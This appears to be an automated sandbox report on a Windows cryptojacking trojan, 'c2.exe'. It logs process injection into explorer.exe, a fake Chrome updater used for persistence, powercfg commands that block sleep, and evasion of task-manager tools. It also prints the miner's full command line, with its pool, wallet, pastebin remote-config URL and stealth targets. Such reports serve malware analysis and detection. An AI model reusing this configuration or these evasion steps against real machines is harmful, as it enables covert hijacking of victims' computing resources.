Source: C:\Program Files\Google\Chrome\updater.exe | Process created: C:\Windows\explorer.exe
Source: c2.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
Source: C:\Windows\explorer.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe" (144 identical entries)
Source: C:\Users\user\Desktop\c2.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: c2.exe | ReversingLabs: Detection: 42%
Source: C:\Users\user\Desktop\c2.exe | File read: C:\Users\user\Desktop\c2.exe
Source: unknown | Process created: C:\Users\user\Desktop\c2.exe "C:\Users\user\Desktop\c2.exe"
Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
Source: unknown | Process created: C:\Program Files\Google\Chrome\updater.exe "C:\Program Files\Google\Chrome\updater.exe"
Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Program Files\Google\Chrome\updater.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
Source: C:\Program Files\Google\Chrome\updater.exe | Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: unknown | Process created: C:\Program Files\Google\Chrome\updater.exe "C:\Program Files\Google\Chrome\updater.exe"
Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
Source: C:\Users\user\Desktop\c2.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
Source: C:\Users\user\Desktop\c2.exe | Process created: unknown unknown (3 identical entries)
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
Source: C:\Program Files\Google\Chrome\updater.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
Source: C:\Program Files\Google\Chrome\updater.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\updater.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe
Source: C:\Program Files\Google\Chrome\updater.exe | Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
Source: C:\Program Files\Google\Chrome\updater.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
Source: C:\Program Files\Google\Chrome\updater.exe | Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll (24 identical entries across the powercfg.exe instances)
Source: C:\Windows\System32\powercfg.exe | Section loaded: umpdc.dll (8 identical entries across the powercfg.exe instances)
                Source: C:\Windows\explorer.exe Section loaded: iphlpapi.dll
                Source: C:\Windows\explorer.exe Section loaded: userenv.dll
                Source: C:\Windows\explorer.exe Section loaded: cryptbase.dll
                Source: C:\Windows\explorer.exe Section loaded: cryptsp.dll
                Source: C:\Windows\explorer.exe Section loaded: rsaenh.dll
                Source: C:\Windows\explorer.exe Section loaded: sspicli.dll
                Source: C:\Windows\explorer.exe Section loaded: powrprof.dll
                Source: C:\Windows\explorer.exe Section loaded: umpdc.dll
                Source: C:\Windows\explorer.exe Section loaded: mswsock.dll
                Source: C:\Windows\explorer.exe Section loaded: dhcpcsvc6.dll
                Source: C:\Windows\explorer.exe Section loaded: dhcpcsvc.dll
                Source: C:\Windows\explorer.exe Section loaded: dnsapi.dll
                Source: C:\Windows\explorer.exe Section loaded: napinsp.dll
                Source: C:\Windows\explorer.exe Section loaded: pnrpnsp.dll
                Source: C:\Windows\explorer.exe Section loaded: wshbth.dll
                Source: C:\Windows\explorer.exe Section loaded: nlaapi.dll
                Source: C:\Windows\explorer.exe Section loaded: winrnr.dll
                Source: C:\Windows\explorer.exe Section loaded: kernel.appcore.dll
                Source: C:\Windows\explorer.exe Section loaded: rasadhlp.dll
                Source: C:\Windows\explorer.exe Section loaded: fwpuclnt.dll
                Source: C:\Windows\explorer.exe Section loaded: wbemcomn.dll
                Source: C:\Windows\explorer.exe Section loaded: amsi.dll
                Source: C:\Windows\explorer.exe Section loaded: profapi.dll
                Source: C:\Windows\explorer.exe Section loaded: msasn1.dll
                Source: C:\Windows\explorer.exe Section loaded: wbemcomn.dll (144 further identical entries)
                Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll (12 identical entries)
                Source: C:\Windows\System32\powercfg.exe Section loaded: umpdc.dll (4 identical entries)
                Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
                Source: c2.exe Static PE information: Image base 0x140000000 > 0x60000000
                Source: c2.exe Static file information: File size 5737472 > 1048576
                Source: c2.exe Static PE information: Raw size of .data is bigger than: 0x100000 < 0x570e00
                Source: c2.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
                Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: conhost.exe, 00000013.00000002.4158581402.000001B6A8670000.00000004.00000001.00020000.00000000.sdmp
                Source: c2.exe Static PE information: section name: .xdata
                Source: updater.exe.0.dr Static PE information: section name: .xdata
                Source: lnobvhjdatqu.tmp.13.dr Static PE information: section name: _RANDOMX
                Source: lnobvhjdatqu.tmp.13.dr Static PE information: section name: _TEXT_CN (2 identical entries)
                Source: lnobvhjdatqu.tmp.13.dr Static PE information: section name: _RDATA

                Persistence and Installation Behavior

                Source: C:\Program Files\Google\Chrome\updater.exe File created: C:\Windows\TEMP\ppefirylicdf.sys
                Source: C:\Users\user\Desktop\c2.exe File created: C:\Program Files\Google\Chrome\updater.exe
                Source: C:\Program Files\Google\Chrome\updater.exe File created: C:\Windows\Temp\ppefirylicdf.sys (2 identical entries)
                Source: C:\Program Files\Google\Chrome\updater.exe File created: C:\Windows\Temp\lnobvhjdatqu.tmp (2 identical entries)

                Hooking and other Techniques for Hiding and Protection

                Source: C:\Program Files\Google\Chrome\updater.exe Module Loaded: C:\WINDOWS\TEMP\LNOBVHJDATQU.TMP (2 identical entries)
                Source: C:\Windows\explorer.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\explorer.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Windows\explorer.exe System information queried: FirmwareTableInformation
                Source: explorer.exe, 00000017.00000003.1732186119.0000000000D80000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.1732250618.0000000000D65000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.1731820245.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.1732232552.0000000000D84000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.1732306589.0000000000D91000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.1732279591.0000000000D8F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.4158658044.0000000000D65000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PROCESSHACKER.EXE
                Source: explorer.exe, 00000017.00000002.4158658044.0000000000CF5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: --CINIT-STEALTH-TARGETS=TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE
                Source: explorer.exe, 00000017.00000003.1732250618.0000000000D65000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.4158658044.0000000000D65000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PROCESSHACKER.EXE(
                Source: explorer.exe, 00000017.00000003.1700744936.0000000000D10000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: HTTPS://PASTEBIN.COM/RAW/YLG9STR0TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXEMYFQVFEXGKNMTDUY
                Source: explorer.exe, 00000017.00000003.1731740655.0000000000DA2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.1732250618.0000000000D57000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.1732135381.0000000000D51000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: "STEALTH-TARGETS": "TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE",
                Source: explorer.exe, 00000017.00000002.4158658044.0000000000CF5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: C:\WINDOWS\EXPLORER.EXE--ALGO=RX/0--URL=XMR-ASIA1.NANOPOOL.ORG:10343--USER=48LXRFPG6ASV91MQWKD8MFG7SNYGQ6RKDHQMO1RYAMJCHPKAIZWFSFAYGQXZEFM6TA4OMTJAB5BAW5GFK84AROJ6FND3XDR--PASS=--CPU-MAX-THREADS-HINT=60--CINIT-WINRING=PPEFIRYLICDF.SYS--CINIT-REMOTE-CONFIG=HTTPS://PASTEBIN.COM/RAW/YLG9STR0--CINIT-STEALTH-TARGETS=TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE--CINIT-STEALTH-FULLSCREEN--CINIT-VERSION=3.3.0--TLS--CINIT-IDLE-WAIT=1--CINIT-IDLE-CPU=100--CINIT-ID=MYFQVFEXGKNMTDUY
                Source: explorer.exe, 00000017.00000003.1732250618.0000000000D65000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXEZ
                Source: explorer.exe, 00000017.00000002.4159469003.0000000001E00000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SV91MQWKD8MFG7SNYGQ6RKDHQMO1RYAMJCHPKAIZWFSFAYGQXZEFM6TA4OMTJAB5BAW5GFK84AROJ6FND3XDRSTEALTH-TARGETSTASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXESTEALTH-FULLSCREENALGO
                Source: explorer.exe, 00000017.00000002.4158658044.0000000000D0F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.1732250618.0000000000D65000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.1731820245.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.1700744936.0000000000D10000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.4158658044.0000000000CF5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.4159469003.0000000001E00000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.4158658044.0000000000D65000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE
                Source: explorer.exe, 00000017.00000003.1732186119.0000000000D80000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.1732232552.0000000000D84000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.1732306589.0000000000D91000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.1732279591.0000000000D8F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PROCESSHACKER.EXEL.EXE0343EV
                Source: explorer.exe, 00000017.00000003.1731820245.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.4158658044.0000000000D65000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXEDLLL
                Source: C:\Program Files\Google\Chrome\updater.exe Dropped PE file which has not been started: C:\Windows\Temp\ppefirylicdf.sys
                Source: C:\Program Files\Google\Chrome\updater.exe Dropped PE file which has not been started: C:\Windows\Temp\lnobvhjdatqu.tmp
                Source: C:\Windows\explorer.exe TID: 7872 Thread sleep count: 137 > 30
                Source: C:\Windows\explorer.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
                Source: C:\Windows\System32\conhost.exe Last function: Thread delayed (4 identical entries)
                Source: updater.exe, 0000000D.00000002.1700987964.00007FF602816000.00000004.00000001.01000000.00000004.sdmp Binary or memory string: VmcII
                Source: explorer.exe, 00000017.00000002.4158658044.0000000000D0F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.4158658044.0000000000CB8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                Source: C:\Users\user\Desktop\c2.exe Process information queried: ProcessInformation
                Source: C:\Windows\System32\conhost.exe Code function: 19_2_00007FF778011131 Sleep,Sleep,_amsg_exit,_initterm,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,_cexit, 19_2_00007FF778011131
                Source: C:\Windows\System32\conhost.exe Code function: 19_2_00007FF77801B1B8 SetUnhandledExceptionFilter, 19_2_00007FF77801B1B8

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Windows\explorer.exe Network Connect: 103.3.62.64 10343
                Source: C:\Windows\explorer.exe Network Connect: 104.20.4.235 443
                Source: C:\Windows\explorer.exe Network Connect: 51.79.145.144 10343
                Source: C:\Program Files\Google\Chrome\updater.exe NtQuerySystemInformation: Direct from: 0x7FF60281303E
                Source: C:\Users\user\Desktop\c2.exe NtQuerySystemInformation: Direct from: 0x7FF632AE303E
                Source: C:\Program Files\Google\Chrome\updater.exe Memory written: PID: 7868 base: BCB010 value: 00
                Source: C:\Program Files\Google\Chrome\updater.exe Section loaded: NULL target: C:\Windows\System32\conhost.exe protection: readonly
                Source: C:\Program Files\Google\Chrome\updater.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: readonly
                Source: C:\Program Files\Google\Chrome\updater.exe Thread register set: target process: 7808
                Source: C:\Program Files\Google\Chrome\updater.exe Thread register set: target process: 7868
                Source: C:\Program Files\Google\Chrome\updater.exe Memory written: C:\Windows\System32\conhost.exe base: B109AD5010
                Source: C:\Program Files\Google\Chrome\updater.exe Memory written: C:\Windows\explorer.exe base: BCB010
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0 (3 identical entries)
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0 (3 identical entries)
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0 (3 identical entries)
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0 (3 identical entries)
                Source: C:\Program Files\Google\Chrome\updater.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe
                Source: C:\Program Files\Google\Chrome\updater.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
                Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Lowering of HIPS / PFW / Operating System Security Settings

                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0 (6 identical entries)
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0 (6 identical entries)
                MITRE ATT&CK matrix (one row per technique set; digits preceding a technique name are the report's per-cell badges, kept as extracted):

                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 11 Windows Management Instrumentation | 1 Windows Service | 1 Windows Service | 11 Masquerading | OS Credential Dumping | 311 Security Software Discovery | Remote Services | Data from Local System | 1 Web Service | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                Credentials | Domains | Default Accounts | Scheduled Task/Job | 11 DLL Side-Loading | 511 Process Injection | 12 Virtualization/Sandbox Evasion | LSASS Memory | 12 Virtualization/Sandbox Evasion | Remote Desktop Protocol | Data from Removable Media | 1 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
                Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 Abuse Elevation Control Mechanism | 511 Process Injection | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact
                Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 11 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | NTDS | 3 System Information Discovery | Distributed Component Object Model | Input Capture | 1 Ingress Tool Transfer | Traffic Duplication | Data Destruction
                Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Abuse Elevation Control Mechanism | LSA Secrets | Internet Connection Discovery | SSH | Keylogging | 2 Non-Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Obfuscated Files or Information
                Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input Capture3
                Application Layer Protocol
                Data Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                DLL Side-Loading
                DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                File Deletion
                Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Behavior Graph (rendered as an image in the original report; node and edge information recovered from the graph text): ID 1576710, Sample: c2.exe, Start date: 17/12/2024, Architecture: WINDOWS, Score: 100
• Start: DNS/IP nodes xmr-asia1.nanopool.org (DNS related to crypt mining pools) and pastebin.com (Connects to a pastebin service (likely for C&C)); signatures: Suricata IDS alerts for network traffic, Malicious sample detected (through community Yara rule), Antivirus detection for dropped file, 8 other signatures; started processes: updater.exe, cmd.exe, c2.exe, 3 other processes
• updater.exe: dropped C:\Windows\Temp\ppefirylicdf.sys (PE32+) and C:\Windows\Temp\lnobvhjdatqu.tmp (PE32+); signatures: Injects code into the Windows Explorer (explorer.exe), Writes to foreign memory regions, Modifies the context of a thread in another process (thread injection), 2 other signatures; started explorer.exe and conhost.exe
• cmd.exe: signatures: Uses powercfg.exe to modify the power settings, Modifies power options to not sleep / hibernate; started conhost.exe, powercfg.exe (2 instances), 2 other processes
• c2.exe: dropped C:\Program Files\Google\Chrome\updater.exe (PE32+); signature: Found direct / indirect Syscall (likely to bypass EDR)
• 3 other processes: started conhost.exe (2 instances), 8 other processes
• explorer.exe (started by updater.exe): network 103.3.62.64, 10343, 49730 (LINODE-APLinodeLLCUS, Singapore); xmr-asia1.nanopool.org 51.79.145.144, 10343, 49732 (OVHFR, Canada); pastebin.com 104.20.4.235, 443, 49731 (CLOUDFLARENETUS, United States); signatures: System process connects to network (likely due to code injection or exploit), Query firmware table information (likely to detect VMs), Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
• conhost.exe (started by updater.exe): signature: Found strings related to Crypto-Mining

Source | Detection | Scanner | Label
c2.exe | 42% | ReversingLabs | Win64.Trojan.Rozena
c2.exe | 100% | Avira | TR/Crypt.EPACK.Gen2
c2.exe | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
C:\Program Files\Google\Chrome\updater.exe | 100% | Avira | TR/Crypt.EPACK.Gen2
C:\Windows\Temp\lnobvhjdatqu.tmp | 100% | Joe Sandbox ML |
C:\Program Files\Google\Chrome\updater.exe | 100% | Joe Sandbox ML |
C:\Program Files\Google\Chrome\updater.exe | 42% | ReversingLabs | Win64.Trojan.Rozena
C:\Windows\Temp\lnobvhjdatqu.tmp | 62% | ReversingLabs | Win64.Trojan.DisguisedXMRigMiner
C:\Windows\Temp\ppefirylicdf.sys | 5% | ReversingLabs |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
xmr-asia1.nanopool.org | 51.79.145.144 | true | false | | high
pastebin.com | 104.20.4.235 | true | false | | high
Name | Malicious | Antivirus Detection | Reputation
https://pastebin.com/raw/YLG9StR0 | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
http://crl.cloudflare.com/origin_ca.crl0 | explorer.exe, 00000017.00000002.4158658044.0000000000D65000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://ocsp.cloudflare.com/origin_ca | explorer.exe, 00000017.00000002.4158658044.0000000000D65000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://pastebin.com/raw/YLG9StR0--cinit-stealth-targets=Taskmgr.exe | explorer.exe, 00000017.00000002.4158658044.0000000000CF5000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://pastebin.com/raw/YLG9StR0$ | explorer.exe, 00000017.00000003.1732250618.0000000000D65000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.4158658044.0000000000D65000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://ocsp.cloudflare.com/origin_ca0 | explorer.exe, 00000017.00000002.4158658044.0000000000D65000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://pastebin.com/raw/YLG9StR08 | explorer.exe, 00000017.00000003.1700744936.0000000000D20000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://pastebin.com/raw/YLG9StR0Taskmgr.exe | explorer.exe, 00000017.00000003.1700744936.0000000000D10000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://crl.cloudflare.com/origin_ca.crl | explorer.exe, 00000017.00000002.4158658044.0000000000D65000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://pastebin.com/raw/YLG9StR090 | explorer.exe, 00000017.00000002.4158658044.0000000000CB8000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://xmrig.com/docs/algorithms | conhost.exe, 00000013.00000002.4158581402.000001B6A8670000.00000004.00000001.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
104.20.4.235 | pastebin.com | United States | 13335 | CLOUDFLARENETUS | false
51.79.145.144 | xmr-asia1.nanopool.org | Canada | 16276 | OVHFR | false
103.3.62.64 | unknown | Singapore | 63949 | LINODE-APLinodeLLCUS | true
                                          Joe Sandbox version:41.0.0 Charoite
                                          Analysis ID:1576710
                                          Start date and time:2024-12-17 12:45:09 +01:00
                                          Joe Sandbox product:CloudBasic
                                          Overall analysis duration:0h 9m 9s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:37
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Sample name:c2.exe
                                          Detection:MAL
                                          Classification:mal100.troj.spyw.evad.mine.winEXE@45/5@2/3
                                          EGA Information:
                                          • Successful, ratio: 25%
                                          HCA Information:Failed
                                          Cookbook Comments:
                                          • Found application associated with file extension: .exe
                                          • Override analysis time to 240000 for current running targets taking high CPU consumption
                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, schtasks.exe
                                          • Excluded IPs from analysis (whitelisted): 4.175.87.197, 13.107.246.63
                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                          • Execution Graph export aborted for target c2.exe, PID 7428 because it is empty
                                          • Execution Graph export aborted for target updater.exe, PID 7684 because it is empty
                                          • Execution Graph export aborted for target updater.exe, PID 7928 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                          • VT rate limit hit for: c2.exe
Time | Type | Description
06:46:01 | API Interceptor | 1x Sleep call for process: c2.exe modified
06:46:02 | API Interceptor | 2x Sleep call for process: updater.exe modified
11:46:03 | Task Scheduler | Run new task: GoogleUpdateTaskMachineQC path: %ProgramFiles%\Google\Chrome\updater.exe
Match | Associated Sample Name / URL | Detection | Threat Name | Context
104.20.4.235 | gabe.ps1 | malicious | Unknown | pastebin.com/raw/sA04Mwk2
104.20.4.235 | cr_asm_crypter.ps1 | malicious | Unknown | pastebin.com/raw/sA04Mwk2
104.20.4.235 | vF20HtY4a4.exe | malicious | Unknown | pastebin.com/raw/sA04Mwk2
104.20.4.235 | OSLdZanXNc.exe | malicious | Unknown | pastebin.com/raw/sA04Mwk2
104.20.4.235 | gaber.ps1 | malicious | Unknown | pastebin.com/raw/sA04Mwk2
